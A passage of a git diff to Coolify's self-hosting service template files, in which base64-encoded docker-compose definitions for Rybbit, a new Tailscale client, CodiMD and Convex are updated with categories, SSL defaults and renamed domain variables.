ltZW91dDogMTBzCiAgICAgIHJldHJpZXM6IDMKICAgICAgc3RhcnRfcGVyaW9kOiAxMHMKICByeWJiaXRfcG9zdGdyZXM6CiAgICBpbWFnZTogJ3Bvc3RncmVzOjE3LjQnCiAgICBlbnZpcm9ubWVudDoKICAgICAgLSAnUE9TVEdSRVNfREI9JHtQT1NUR1JFU19EQjotYW5hbHl0aWNzfScKICAgICAgLSAnUE9TVEdSRVNfVVNFUj0ke1BPU1RHUkVTX1VTRVI6LWZyb2d9JwogICAgICAtICdQT1NUR1JFU19QQVNTV09SRD0ke1NFUlZJQ0VfUEFTU1dPUkRfUE9TVEdSRVN9JwogICAgdm9sdW1lczoKICAgICAgLSAncG9zdGdyZXNfZGF0YTovdmFyL2xpYi9wb3N0Z3Jlc3FsL2RhdGEnCiAgICBoZWFsdGhjaGVjazoKICAgICAgdGVzdDoKICAgICAgICAtIENNRC1TSEVMTAogICAgICAgIC0gJ3BnX2lzcmVhZHkgLVUgJCR7UE9TVEdSRVNfVVNFUn0gLWQgJCR7UE9TVEdSRVNfREJ9JwogICAgICBpbnRlcnZhbDogMzBzCiAgICAgIHRpbWVvdXQ6IDEwcwogICAgICByZXRyaWVzOiAzCiAgcnliYml0X2NsaWNraG91c2U6CiAgICBpbWFnZTogJ2NsaWNraG91c2UvY2xpY2tob3VzZS1zZXJ2ZXI6MjUuNC4yJwogICAgZW52aXJvbm1lbnQ6CiAgICAgIC0gJ0NMSUNLSE9VU0VfREI9JHtDTElDS0hPVVNFX0RCOi1hbmFseXRpY3N9JwogICAgICAtICdDTElDS0hPVVNFX1VTRVI9JHtDTElDS0hPVVNFX1VTRVI6LWRlZmF1bHR9JwogICAgICAtICdDTElDS0hPVVNFX1BBU1NXT1JEPSR7U0VSVklDRV9QQVNTV09SRF9DTElDS0hPVVNFfScKICAgIGhlYWx0aGNoZWNrOgogICAgICB0ZXN0OgogICAgICAgIC0gQ01ECiAgICAgICAgLSB3Z2V0CiAgICAgICAgLSAnLS1uby12ZXJib3NlJwogICAgICAgIC0gJy0tdHJpZXM9MScKICAgICAgICAtICctLXNwaWRlcicKICAgICAgICAtICdodHRwOi8vbG9jYWxob3N0OjgxMjMvcGluZycKICAgICAgaW50ZXJ2YWw6IDMwcwogICAgICB0aW1lb3V0OiAxMHMKICAgICAgcmV0cmllczogMwogICAgICBzdGFydF9wZXJpb2Q6IDEwcwogICAgdm9sdW1lczoKICAgICAgLSAnY2xpY2tob3VzZV9kYXRhOi92YXIvbGliL2NsaWNraG91c2UnCiAgICAgIC0KICAgICAgICB0eXBlOiBiaW5kCiAgICAgICAgc291cmNlOiAuL2NsaWNraG91c2VfY29uZmlnL2VuYWJsZV9qc29uLnhtbAogICAgICAgIHRhcmdldDogL2V0Yy9jbGlja2hvdXNlLXNlcnZlci9jb25maWcuZC9lbmFibGVfanNvbi54bWwKICAgICAgICBjb250ZW50OiAiPGNsaWNraG91c2U+XG4gICAgPHNldHRpbmdzPlxuICAgICAgICA8ZW5hYmxlX2pzb25fdHlwZT4xPC9lbmFibGVfanNvbl90eXBlPlxuICAgIDwvc2V0dGluZ3M+XG48L2NsaWNraG91c2U+XG4iCiAgICAgIC0KICAgICAgICB0eXBlOiBiaW5kCiAgICAgICAgc291cmNlOiAuL2NsaWNraG91c2VfY29uZmlnL2xvZ2dpbmdfcnVsZXMueG1sCiAgICAgICAgdGFyZ2V0OiAvZXRjL2NsaWNraG91c2Utc2VydmVyL2NvbmZpZy5kL2xvZ2dpbmdfcnVsZXMueG1sCiAgICAgICAgY29udGVudDogIjxjbGlja2hvdXNlPlxuICAgIDxsb2dnZXI+XG4gICAgICAgIDxsZXZlbD53YXJuaW5nPC9sZXZlbD5cbiAgICAgICAgPGNvbnNvbGU+dHJ1ZTwvY29uc29sZT5cbiAgICA8L2xvZ2dlcj5cbiAgICA8cXVlcnlfdGhyZWFkX2xvZyByZW1vdmU9XCJyZW1vdmVcIi8+XG4gICAgPHF1ZXJ5X2xvZyByZW1vdmU9XCJyZW1vdmVcIi8+XG4gICAgPHRleHRfbG9nIHJlbW92ZT1cInJlbW92ZVwiLz5cbiAgICA8dHJhY2VfbG9nIHJlbW92ZT1cInJlbW92ZVwiLz5cbiAgICA8bWV0cmljX2xvZyByZW1vdmU9XCJyZW1vdmVcIi8+XG4gICAgPGFzeW5jaHJvbm91c19tZXRyaWNfbG9nIHJlbW92ZT1cInJlbW92ZVwiLz5cbiAgICA8c2Vzc2lvbl9sb2cgcmVtb3ZlPVwicmVtb3ZlXCIvPlxuICAgIDxwYXJ0X2xvZyByZW1vdmU9XCJyZW1vdmVcIi8+XG4gICAgPGxhdGVuY3lfbG9nIHJlbW92ZT1cInJlbW92ZVwiLz5cbiAgICA8cHJvY2Vzc29yc19wcm9maWxlX2xvZyByZW1vdmU9XCJyZW1vdmVcIi8+XG48L2NsaWNraG91c2U+IgogICAgICAtCiAgICAgICAgdHlwZTogYmluZAogICAgICAgIHNvdXJjZTogLi9jbGlja2hvdXNlX2NvbmZpZy9uZXR3b3JrLnhtbAogICAgICAgIHRhcmdldDogL2V0Yy9jbGlja2hvdXNlLXNlcnZlci9jb25maWcuZC9uZXR3b3JrLnhtbAogICAgICAgIGNvbnRlbnQ6ICI8Y2xpY2tob3VzZT5cbiAgICA8bGlzdGVuX2hvc3Q+MC4wLjAuMDwvbGlzdGVuX2hvc3Q+XG48L2NsaWNraG91c2U+XG4iCiAgICAgIC0KICAgICAgICB0eXBlOiBiaW5kCiAgICAgICAgc291cmNlOiAuL2NsaWNraG91c2VfY29uZmlnL3VzZXJfbG9nZ2luZy54bWwKICAgICAgICB0YXJnZXQ6IC9ldGMvY2xpY2tob3VzZS1zZXJ2ZXIvY29uZmlnLmQvdXNlcl9sb2dnaW5nLnhtbAogICAgICAgIGNvbnRlbnQ6ICI8Y2xpY2tob3VzZT5cbiAgICA8cHJvZmlsZXM+XG4gICAgICAgIDxkZWZhdWx0PlxuICAgICAgICAgICAgPGxvZ19xdWVyaWVzPjA8L2xvZ19xdWVyaWVzPlxuICAgICAgICAgICAgPGxvZ19xdWVyeV90aHJlYWRzPjA8L2xvZ19xdWVyeV90aHJlYWRzPlxuICAgICAgICAgICAgPGxvZ19wcm9jZXNzb3JzX3Byb2ZpbGVzPjA8L2xvZ19wcm9jZXNzb3JzX3Byb2ZpbGVzPlxuICAgICAgICA8L2RlZmF1bHQ+XG4gICAgPC9wcm9maWxlcz5cbjwvY2xpY2tob3VzZT5cbiIK", "tags": [ "analytics", "web", @@ -3673,7 +3729,7 @@ "clickhouse", "postgres" ], - "category": null, + "category": "analytics", "logo": "svgs/rybbit.svg", "minversion": "0.0.0", "port": "3002" @@ -4034,6 +4090,19 @@ "minversion": "0.0.0", "port": "8384" }, + "tailscale-client": { + "documentation": "https://tailscale.com/kb?utm_source=coolify.io", + "slogan": "Tailscale securely connects your devices over the internet using WireGuard.", + "compose": "c2VydmljZXM6CiAgdGFpbHNjYWxlLWNsaWVudDoKICAgIGltYWdlOiAndGFpbHNjYWxlL3RhaWxzY2FsZTpsYXRlc3QnCiAgICBob3N0bmFtZTogJyR7VFNfSE9TVE5BTUU6LWNvb2xpZnktdHN9JwogICAgZW52aXJvbm1lbnQ6CiAgICAgIC0gJ1RTX0hPU1ROQU1FPSR7VFNfSE9TVE5BTUU6LWNvb2xpZnktdHN9JwogICAgICAtICdUU19BVVRIS0VZPSR7VFNfQVVUSEtFWTo/fScKICAgICAgLSAnVFNfU1RBVEVfRElSPSR7VFNfU1RBVEVfRElSOi0vdmFyL2xpYi90YWlsc2NhbGV9JwogICAgICAtICdUU19VU0VSU1BBQ0U9JHtUU19VU0VSU1BBQ0U6LWZhbHNlfScKICAgIHZvbHVtZXM6CiAgICAgIC0gJ3RhaWxzY2FsZS1jbGllbnQ6L3Zhci9saWIvdGFpbHNjYWxlJwogICAgZGV2aWNlczoKICAgICAgLSAnL2Rldi9uZXQvdHVuOi9kZXYvbmV0L3R1bicKICAgIGNhcF9hZGQ6CiAgICAgIC0gbmV0X2FkbWluCiAgICBoZWFsdGhjaGVjazoKICAgICAgdGVzdDoKICAgICAgICAtIENNRC1TSEVMTAogICAgICAgIC0gInRhaWxzY2FsZSBzdGF0dXMgLS1qc29uIHwgZ3JlcCAtcSAnQmFja2VuZFN0YXRlJyIKICAgICAgaW50ZXJ2YWw6IDEwcwogICAgICB0aW1lb3V0OiA1cwogICAgICByZXRyaWVzOiA1CiAgbmdpbng6CiAgICBpbWFnZTogJ25naW54OmxhdGVzdCcKICAgIGRlcGVuZHNfb246CiAgICAgIC0gdGFpbHNjYWxlLWNsaWVudAogICAgbmV0d29ya19tb2RlOiAnc2VydmljZTp0YWlsc2NhbGUtY2xpZW50JwogICAgaGVhbHRoY2hlY2s6CiAgICAgIHRlc3Q6CiAgICAgICAgLSBDTUQKICAgICAgICAtIGN1cmwKICAgICAgICAtICctZicKICAgICAgICAtICdodHRwOi8vbG9jYWxob3N0OjgwLycKICAgICAgICAtICctbycKICAgICAgICAtIC9kZXYvbnVsbAogICAgICBpbnRlcnZhbDogMjBzCiAgICAgIHRpbWVvdXQ6IDVzCiAgICAgIHJldHJpZXM6IDMK", + "tags": [ + "vpn", + "wireguard", + "remote-access" + ], + "category": "networking", + "logo": "svgs/tailscale.svg", + "minversion": "0.0.0" + }, "teable": { "documentation": "https://help.teable.io/?utm_source=coolify.io", "slogan": "Teable is a powerful visual interface built on relational databases (PostgreSQL).", diff --git a/templates/service-templates.json b/templates/service-templates.json index d711b9d95..398a23e42 100644 --- a/templates/service-templates.json +++ b/templates/service-templates.json @@ -581,7 +581,7 @@ "codimd": { "documentation": "https://hackmd.io/c/codimd-documentation?utm_source=coolify.io", "slogan": "Realtime collaborative markdown notes on all platforms", - "compose": "c2VydmljZXM6CiAgY29kaW1kOgogICAgaW1hZ2U6ICduYWJvLmNvZGltZC5kZXYvaGFja21kaW8vaGFja21kOmxhdGVzdCcKICAgIGVudmlyb25tZW50OgogICAgICAtIFNFUlZJQ0VfRlFETl9DT0RJTURfMzAwMAogICAgICAtICdDTURfRE9NQUlOPSR7U0VSVklDRV9GUUROX0NPRElNRH0nCiAgICAgIC0gJ0NNRF9QUk9UT0NPTF9VU0VTU0w9JHtDTURfUFJPVE9DT0xfVVNFU1NMOi1mYWxzZX0nCiAgICAgIC0gJ0NNRF9TRVNTSU9OX1NFQ1JFVD0ke1NFUlZJQ0VfUEFTU1dPUkRfU0VTU0lPTlNFQ1JFVH0nCiAgICAgIC0gJ0NNRF9VU0VDRE49JHtDTURfVVNFQ0ROOi1mYWxzZX0nCiAgICAgIC0gJ0NNRF9EQl9VUkw9cG9zdGdyZXM6Ly8ke1NFUlZJQ0VfVVNFUl9QT1NUR1JFU306JHtTRVJWSUNFX1BBU1NXT1JEX1BPU1RHUkVTfUBwb3N0Z3Jlczo1NDMyLyR7UE9TVEdSRVNfREI6LWNvZGltZC1kYn0nCiAgICAgIC0gJ0NNRF9FTUFJTD0ke0NNRF9FTUFJTDotdHJ1ZX0nCiAgICAgIC0gJ0NNRF9BTExPV19FTUFJTF9SRUdJU1RFUj0ke0NNRF9BTExPV19FTUFJTF9SRUdJU1RFUjotdHJ1ZX0nCiAgICBkZXBlbmRzX29uOgogICAgICBwb3N0Z3JlczoKICAgICAgICBjb25kaXRpb246IHNlcnZpY2VfaGVhbHRoeQogICAgaGVhbHRoY2hlY2s6CiAgICAgIHRlc3Q6CiAgICAgICAgLSBDTUQtU0hFTEwKICAgICAgICAtICdjdXJsIC1mIGh0dHA6Ly9sb2NhbGhvc3Q6MzAwMC8gfHwgZXhpdCAxJwogICAgICBpbnRlcnZhbDogNXMKICAgICAgdGltZW91dDogMjBzCiAgICAgIHJldHJpZXM6IDUKICAgIHZvbHVtZXM6CiAgICAgIC0gJ3VwbG9hZHNfZGF0YTovaG9tZS9oYWNrbWQvYXBwL3B1YmxpYy91cGxvYWRzJwogIHBvc3RncmVzOgogICAgaW1hZ2U6ICdwb3N0Z3JlczoxNi1hbHBpbmUnCiAgICB2b2x1bWVzOgogICAgICAtICdjb2RpbWRfcG9zdGdyZXNfZGF0YTovdmFyL2xpYi9wb3N0Z3Jlc3FsL2RhdGEnCiAgICBlbnZpcm9ubWVudDoKICAgICAgLSAnUE9TVEdSRVNfVVNFUj0ke1NFUlZJQ0VfVVNFUl9QT1NUR1JFU30nCiAgICAgIC0gJ1BPU1RHUkVTX1BBU1NXT1JEPSR7U0VSVklDRV9QQVNTV09SRF9QT1NUR1JFU30nCiAgICAgIC0gJ1BPU1RHUkVTX0RCPSR7UE9TVEdSRVNfREI6LWNvZGltZC1kYn0nCiAgICBoZWFsdGhjaGVjazoKICAgICAgdGVzdDoKICAgICAgICAtIENNRC1TSEVMTAogICAgICAgIC0gJ3BnX2lzcmVhZHkgLVUgJCR7UE9TVEdSRVNfVVNFUn0gLWQgJCR7UE9TVEdSRVNfREJ9JwogICAgICBpbnRlcnZhbDogNXMKICAgICAgdGltZW91dDogMjBzCiAgICAgIHJldHJpZXM6IDEwCg==", + "compose": "c2VydmljZXM6CiAgY29kaW1kOgogICAgaW1hZ2U6ICduYWJvLmNvZGltZC5kZXYvaGFja21kaW8vaGFja21kOmxhdGVzdCcKICAgIGVudmlyb25tZW50OgogICAgICAtIFNFUlZJQ0VfRlFETl9DT0RJTURfMzAwMAogICAgICAtICdDTURfRE9NQUlOPSR7U0VSVklDRV9GUUROX0NPRElNRH0nCiAgICAgIC0gJ0NNRF9QUk9UT0NPTF9VU0VTU0w9JHtDTURfUFJPVE9DT0xfVVNFU1NMOi10cnVlfScKICAgICAgLSAnQ01EX1NFU1NJT05fU0VDUkVUPSR7U0VSVklDRV9QQVNTV09SRF9TRVNTSU9OU0VDUkVUfScKICAgICAgLSAnQ01EX1VTRUNETj0ke0NNRF9VU0VDRE46LWZhbHNlfScKICAgICAgLSAnQ01EX0RCX1VSTD1wb3N0Z3JlczovLyR7U0VSVklDRV9VU0VSX1BPU1RHUkVTfToke1NFUlZJQ0VfUEFTU1dPUkRfUE9TVEdSRVN9QHBvc3RncmVzOjU0MzIvJHtQT1NUR1JFU19EQjotY29kaW1kLWRifScKICAgICAgLSAnQ01EX0VNQUlMPSR7Q01EX0VNQUlMOi10cnVlfScKICAgICAgLSAnQ01EX0FMTE9XX0VNQUlMX1JFR0lTVEVSPSR7Q01EX0FMTE9XX0VNQUlMX1JFR0lTVEVSOi10cnVlfScKICAgIGRlcGVuZHNfb246CiAgICAgIHBvc3RncmVzOgogICAgICAgIGNvbmRpdGlvbjogc2VydmljZV9oZWFsdGh5CiAgICBoZWFsdGhjaGVjazoKICAgICAgdGVzdDoKICAgICAgICAtIENNRC1TSEVMTAogICAgICAgIC0gJ2N1cmwgLWYgaHR0cDovL2xvY2FsaG9zdDozMDAwLyB8fCBleGl0IDEnCiAgICAgIGludGVydmFsOiA1cwogICAgICB0aW1lb3V0OiAyMHMKICAgICAgcmV0cmllczogNQogICAgdm9sdW1lczoKICAgICAgLSAndXBsb2Fkc19kYXRhOi9ob21lL2hhY2ttZC9hcHAvcHVibGljL3VwbG9hZHMnCiAgcG9zdGdyZXM6CiAgICBpbWFnZTogJ3Bvc3RncmVzOjE2LWFscGluZScKICAgIHZvbHVtZXM6CiAgICAgIC0gJ2NvZGltZF9wb3N0Z3Jlc19kYXRhOi92YXIvbGliL3Bvc3RncmVzcWwvZGF0YScKICAgIGVudmlyb25tZW50OgogICAgICAtICdQT1NUR1JFU19VU0VSPSR7U0VSVklDRV9VU0VSX1BPU1RHUkVTfScKICAgICAgLSAnUE9TVEdSRVNfUEFTU1dPUkQ9JHtTRVJWSUNFX1BBU1NXT1JEX1BPU1RHUkVTfScKICAgICAgLSAnUE9TVEdSRVNfREI9JHtQT1NUR1JFU19EQjotY29kaW1kLWRifScKICAgIGhlYWx0aGNoZWNrOgogICAgICB0ZXN0OgogICAgICAgIC0gQ01ELVNIRUxMCiAgICAgICAgLSAncGdfaXNyZWFkeSAtVSAkJHtQT1NUR1JFU19VU0VSfSAtZCAkJHtQT1NUR1JFU19EQn0nCiAgICAgIGludGVydmFsOiA1cwogICAgICB0aW1lb3V0OiAyMHMKICAgICAgcmV0cmllczogMTAK", "tags": [ "markdown", "md", @@ -599,7 +599,7 @@ "convex": { "documentation": "https://github.com/get-convex/convex-backend/blob/main/self-hosted/README.md?utm_source=coolify.io", "slogan": "Convex is the open-source reactive database for app developers.", - "compose": "c2VydmljZXM6CiAgYmFja2VuZDoKICAgIGltYWdlOiAnZ2hjci5pby9nZXQtY29udmV4L2NvbnZleC1iYWNrZW5kOjAwYmQ5MjcyMzQyMmYzYmZmOTY4MjMwYzk0Y2NkZWI4YzE3MTk4MzInCiAgICB2b2x1bWVzOgogICAgICAtICdkYXRhOi9jb252ZXgvZGF0YScKICAgIGVudmlyb25tZW50OgogICAgICAtIFNFUlZJQ0VfRlFETl9CQUNLRU5EXzMyMTAKICAgICAgLSAnSU5TVEFOQ0VfTkFNRT0ke0lOU1RBTkNFX05BTUU6LXNlbGYtaG9zdGVkLWNvbnZleH0nCiAgICAgIC0gJ0lOU1RBTkNFX1NFQ1JFVD0ke1NFUlZJQ0VfSEVYXzMyX1NFQ1JFVH0nCiAgICAgIC0gJ0NPTlZFWF9SRUxFQVNFX1ZFUlNJT05fREVWPSR7Q09OVkVYX1JFTEVBU0VfVkVSU0lPTl9ERVY6LX0nCiAgICAgIC0gJ0FDVElPTlNfVVNFUl9USU1FT1VUX1NFQ1M9JHtBQ1RJT05TX1VTRVJfVElNRU9VVF9TRUNTOi19JwogICAgICAtICdDT05WRVhfQ0xPVURfT1JJR0lOPSR7U0VSVklDRV9GUUROX0NPTlZFWH0nCiAgICAgIC0gJ0NPTlZFWF9TSVRFX09SSUdJTj0ke1NFUlZJQ0VfRlFETl9CQUNLRU5EfScKICAgICAgLSAnREFUQUJBU0VfVVJMPSR7REFUQUJBU0VfVVJMOi19JwogICAgICAtICdESVNBQkxFX0JFQUNPTj0ke0RJU0FCTEVfQkVBQ09OOj9mYWxzZX0nCiAgICAgIC0gJ1JFREFDVF9MT0dTX1RPX0NMSUVOVD0ke1JFREFDVF9MT0dTX1RPX0NMSUVOVDo/ZmFsc2V9JwogICAgICAtICdET19OT1RfUkVRVUlSRV9TU0w9JHtET19OT1RfUkVRVUlSRV9TU0w6P3RydWV9JwogICAgICAtICdQT1NUR1JFU19VUkw9JHtQT1NUR1JFU19VUkw6LX0nCiAgICAgIC0gJ01ZU1FMX1VSTD0ke01ZU1FMX1VSTDotfScKICAgICAgLSAnUlVTVF9MT0c9JHtSVVNUX0xPRzotaW5mb30nCiAgICAgIC0gJ1JVU1RfQkFDS1RSQUNFPSR7UlVTVF9CQUNLVFJBQ0U6LX0nCiAgICAgIC0gJ0FXU19SRUdJT049JHtBV1NfUkVHSU9OOi19JwogICAgICAtICdBV1NfQUNDRVNTX0tFWV9JRD0ke0FXU19BQ0NFU1NfS0VZX0lEOi19JwogICAgICAtICdBV1NfU0VDUkVUX0FDQ0VTU19LRVk9JHtBV1NfU0VDUkVUX0FDQ0VTU19LRVk6LX0nCiAgICAgIC0gJ0FXU19TRVNTSU9OX1RPS0VOPSR7QVdTX1NFU1NJT05fVE9LRU46LX0nCiAgICAgIC0gJ0FXU19TM19GT1JDRV9QQVRIX1NUWUxFPSR7QVdTX1MzX0ZPUkNFX1BBVEhfU1RZTEU6LX0nCiAgICAgIC0gJ0FXU19TM19ESVNBQkxFX1NTRT0ke0FXU19TM19ESVNBQkxFX1NTRTotfScKICAgICAgLSAnQVdTX1MzX0RJU0FCTEVfQ0hFQ0tTVU1TPSR7QVdTX1MzX0RJU0FCTEVfQ0hFQ0tTVU1TOi19JwogICAgICAtICdTM19TVE9SQUdFX0VYUE9SVFNfQlVDS0VUPSR7UzNfU1RPUkFHRV9FWFBPUlRTX0JVQ0tFVDotfScKICAgICAgLSAnUzNfU1RPUkFHRV9TTkFQU0hPVF9JTVBPUlRTX0JVQ0tFVD0ke1MzX1NUT1JBR0VfU05BUFNIT1RfSU1QT1JUU19CVUNLRVQ6LX0nCiAgICAgIC0gJ1MzX1NUT1JBR0VfTU9EVUxFU19CVUNLRVQ9JHtTM19TVE9SQUdFX01PRFVMRVNfQlVDS0VUOi19JwogICAgICAtICdTM19TVE9SQUdFX0ZJTEVTX0JVQ0tFVD0ke1MzX1NUT1JBR0VfRklMRVNfQlVDS0VUOi19JwogICAgICAtICdTM19TVE9SQUdFX1NFQVJDSF9CVUNLRVQ9JHtTM19TVE9SQUdFX1NFQVJDSF9CVUNLRVQ6LX0nCiAgICAgIC0gJ1MzX0VORFBPSU5UX1VSTD0ke1MzX0VORFBPSU5UX1VSTDotfScKICAgIGhlYWx0aGNoZWNrOgogICAgICB0ZXN0OiAnY3VybCAtZiBodHRwOi8vMTI3LjAuMC4xOjMyMTAvdmVyc2lvbicKICAgICAgaW50ZXJ2YWw6IDVzCiAgICAgIHN0YXJ0X3BlcmlvZDogMTBzCiAgZGFzaGJvYXJkOgogICAgaW1hZ2U6ICdnaGNyLmlvL2dldC1jb252ZXgvY29udmV4LWRhc2hib2FyZDozM2NlZjc3NWE4YTYyMjhjYmFjZWU0YTA5YWMyYzQwNzNkNjJlZDEzJwogICAgZW52aXJvbm1lbnQ6CiAgICAgIC0gU0VSVklDRV9GUUROX0NPTlZFWF82NzkxCiAgICAgIC0gJ05FWFRfUFVCTElDX0RFUExPWU1FTlRfVVJMPSR7U0VSVklDRV9GUUROX0JBQ0tFTkR9JwogICAgZGVwZW5kc19vbjoKICAgICAgYmFja2VuZDoKICAgICAgICBjb25kaXRpb246IHNlcnZpY2VfaGVhbHRoeQogICAgaGVhbHRoY2hlY2s6CiAgICAgIHRlc3Q6ICd3Z2V0IC1xTy0gaHR0cDovLzEyNy4wLjAuMTo2NzkxLycKICAgICAgaW50ZXJ2YWw6IDVzCiAgICAgIHN0YXJ0X3BlcmlvZDogNXMK", + "compose": "c2VydmljZXM6CiAgYmFja2VuZDoKICAgIGltYWdlOiAnZ2hjci5pby9nZXQtY29udmV4L2NvbnZleC1iYWNrZW5kOjAwYmQ5MjcyMzQyMmYzYmZmOTY4MjMwYzk0Y2NkZWI4YzE3MTk4MzInCiAgICB2b2x1bWVzOgogICAgICAtICdkYXRhOi9jb252ZXgvZGF0YScKICAgIGVudmlyb25tZW50OgogICAgICAtIFNFUlZJQ0VfRlFETl9CQUNLRU5EXzMyMTAKICAgICAgLSAnSU5TVEFOQ0VfTkFNRT0ke0lOU1RBTkNFX05BTUU6LXNlbGYtaG9zdGVkLWNvbnZleH0nCiAgICAgIC0gJ0lOU1RBTkNFX1NFQ1JFVD0ke1NFUlZJQ0VfSEVYXzMyX1NFQ1JFVH0nCiAgICAgIC0gJ0NPTlZFWF9SRUxFQVNFX1ZFUlNJT05fREVWPSR7Q09OVkVYX1JFTEVBU0VfVkVSU0lPTl9ERVY6LX0nCiAgICAgIC0gJ0FDVElPTlNfVVNFUl9USU1FT1VUX1NFQ1M9JHtBQ1RJT05TX1VTRVJfVElNRU9VVF9TRUNTOi19JwogICAgICAtICdDT05WRVhfQ0xPVURfT1JJR0lOPSR7U0VSVklDRV9GUUROX0RBU0hCT0FSRH0nCiAgICAgIC0gJ0NPTlZFWF9TSVRFX09SSUdJTj0ke1NFUlZJQ0VfRlFETl9CQUNLRU5EfScKICAgICAgLSAnREFUQUJBU0VfVVJMPSR7REFUQUJBU0VfVVJMOi19JwogICAgICAtICdESVNBQkxFX0JFQUNPTj0ke0RJU0FCTEVfQkVBQ09OOj9mYWxzZX0nCiAgICAgIC0gJ1JFREFDVF9MT0dTX1RPX0NMSUVOVD0ke1JFREFDVF9MT0dTX1RPX0NMSUVOVDo/ZmFsc2V9JwogICAgICAtICdET19OT1RfUkVRVUlSRV9TU0w9JHtET19OT1RfUkVRVUlSRV9TU0w6P3RydWV9JwogICAgICAtICdQT1NUR1JFU19VUkw9JHtQT1NUR1JFU19VUkw6LX0nCiAgICAgIC0gJ01ZU1FMX1VSTD0ke01ZU1FMX1VSTDotfScKICAgICAgLSAnUlVTVF9MT0c9JHtSVVNUX0xPRzotaW5mb30nCiAgICAgIC0gJ1JVU1RfQkFDS1RSQUNFPSR7UlVTVF9CQUNLVFJBQ0U6LX0nCiAgICAgIC0gJ0FXU19SRUdJT049JHtBV1NfUkVHSU9OOi19JwogICAgICAtICdBV1NfQUNDRVNTX0tFWV9JRD0ke0FXU19BQ0NFU1NfS0VZX0lEOi19JwogICAgICAtICdBV1NfU0VDUkVUX0FDQ0VTU19LRVk9JHtBV1NfU0VDUkVUX0FDQ0VTU19LRVk6LX0nCiAgICAgIC0gJ0FXU19TRVNTSU9OX1RPS0VOPSR7QVdTX1NFU1NJT05fVE9LRU46LX0nCiAgICAgIC0gJ0FXU19TM19GT1JDRV9QQVRIX1NUWUxFPSR7QVdTX1MzX0ZPUkNFX1BBVEhfU1RZTEU6LX0nCiAgICAgIC0gJ0FXU19TM19ESVNBQkxFX1NTRT0ke0FXU19TM19ESVNBQkxFX1NTRTotfScKICAgICAgLSAnQVdTX1MzX0RJU0FCTEVfQ0hFQ0tTVU1TPSR7QVdTX1MzX0RJU0FCTEVfQ0hFQ0tTVU1TOi19JwogICAgICAtICdTM19TVE9SQUdFX0VYUE9SVFNfQlVDS0VUPSR7UzNfU1RPUkFHRV9FWFBPUlRTX0JVQ0tFVDotfScKICAgICAgLSAnUzNfU1RPUkFHRV9TTkFQU0hPVF9JTVBPUlRTX0JVQ0tFVD0ke1MzX1NUT1JBR0VfU05BUFNIT1RfSU1QT1JUU19CVUNLRVQ6LX0nCiAgICAgIC0gJ1MzX1NUT1JBR0VfTU9EVUxFU19CVUNLRVQ9JHtTM19TVE9SQUdFX01PRFVMRVNfQlVDS0VUOi19JwogICAgICAtICdTM19TVE9SQUdFX0ZJTEVTX0JVQ0tFVD0ke1MzX1NUT1JBR0VfRklMRVNfQlVDS0VUOi19JwogICAgICAtICdTM19TVE9SQUdFX1NFQVJDSF9CVUNLRVQ9JHtTM19TVE9SQUdFX1NFQVJDSF9CVUNLRVQ6LX0nCiAgICAgIC0gJ1MzX0VORFBPSU5UX1VSTD0ke1MzX0VORFBPSU5UX1VSTDotfScKICAgIGhlYWx0aGNoZWNrOgogICAgICB0ZXN0OiAnY3VybCAtZiBodHRwOi8vMTI3LjAuMC4xOjMyMTAvdmVyc2lvbicKICAgICAgaW50ZXJ2YWw6IDVzCiAgICAgIHN0YXJ0X3BlcmlvZDogMTBzCiAgZGFzaGJvYXJkOgogICAgaW1hZ2U6ICdnaGNyLmlvL2dldC1jb252ZXgvY29udmV4LWRhc2hib2FyZDozM2NlZjc3NWE4YTYyMjhjYmFjZWU0YTA5YWMyYzQwNzNkNjJlZDEzJwogICAgZW52aXJvbm1lbnQ6CiAgICAgIC0gU0VSVklDRV9GUUROX0RBU0hCT0FSRF82NzkxCiAgICAgIC0gJ05FWFRfUFVCTElDX0RFUExPWU1FTlRfVVJMPSR7U0VSVklDRV9GUUROX0JBQ0tFTkR9JwogICAgZGVwZW5kc19vbjoKICAgICAgYmFja2VuZDoKICAgICAgICBjb25kaXRpb246IHNlcnZpY2VfaGVhbHRoeQogICAgaGVhbHRoY2hlY2s6CiAgICAgIHRlc3Q6ICd3Z2V0IC1xTy0gaHR0cDovLzEyNy4wLjAuMTo2NzkxLycKICAgICAgaW50ZXJ2YWw6IDVzCiAgICAgIHN0YXJ0X3BlcmlvZDogNXMK", "tags": [ "database", "reactive", @@ -760,7 +760,7 @@ "documenso": { "documentation": "https://docs.documenso.com/?utm_source=coolify.io", "slogan": "Document signing, finally open source", - "compose": "c2VydmljZXM6CiAgZG9jdW1lbnNvOgogICAgaW1hZ2U6ICdkb2N1bWVuc28vZG9jdW1lbnNvOnYxLjEyLjEwJwogICAgZGVwZW5kc19vbjoKICAgICAgZGF0YWJhc2U6CiAgICAgICAgY29uZGl0aW9uOiBzZXJ2aWNlX2hlYWx0aHkKICAgIGVudmlyb25tZW50OgogICAgICAtIFNFUlZJQ0VfRlFETl9ET0NVTUVOU09fMzAwMAogICAgICAtICdORVhUQVVUSF9VUkw9JHtTRVJWSUNFX0ZRRE5fRE9DVU1FTlNPfScKICAgICAgLSAnTkVYVEFVVEhfU0VDUkVUPSR7U0VSVklDRV9CQVNFNjRfQVVUSFNFQ1JFVH0nCiAgICAgIC0gJ05FWFRfUFJJVkFURV9FTkNSWVBUSU9OX0tFWT0ke1NFUlZJQ0VfQkFTRTY0X0VOQ1JZUFRJT05LRVl9JwogICAgICAtICdORVhUX1BSSVZBVEVfRU5DUllQVElPTl9TRUNPTkRBUllfS0VZPSR7U0VSVklDRV9CQVNFNjRfU0VDT05EQVJZRU5DUllQVElPTktFWX0nCiAgICAgIC0gJ05FWFRfUFVCTElDX1dFQkFQUF9VUkw9JHtTRVJWSUNFX0ZRRE5fRE9DVU1FTlNPfScKICAgICAgLSAnTkVYVF9QUklWQVRFX1JFU0VORF9BUElfS0VZPSR7TkVYVF9QUklWQVRFX1JFU0VORF9BUElfS0VZfScKICAgICAgLSAnTkVYVF9QUklWQVRFX1NNVFBfVFJBTlNQT1JUPSR7TkVYVF9QUklWQVRFX1NNVFBfVFJBTlNQT1JUfScKICAgICAgLSAnTkVYVF9QUklWQVRFX1NNVFBfSE9TVD0ke05FWFRfUFJJVkFURV9TTVRQX0hPU1R9JwogICAgICAtICdORVhUX1BSSVZBVEVfU01UUF9QT1JUPSR7TkVYVF9QUklWQVRFX1NNVFBfUE9SVH0nCiAgICAgIC0gJ05FWFRfUFJJVkFURV9TTVRQX1VTRVJOQU1FPSR7TkVYVF9QUklWQVRFX1NNVFBfVVNFUk5BTUV9JwogICAgICAtICdORVhUX1BSSV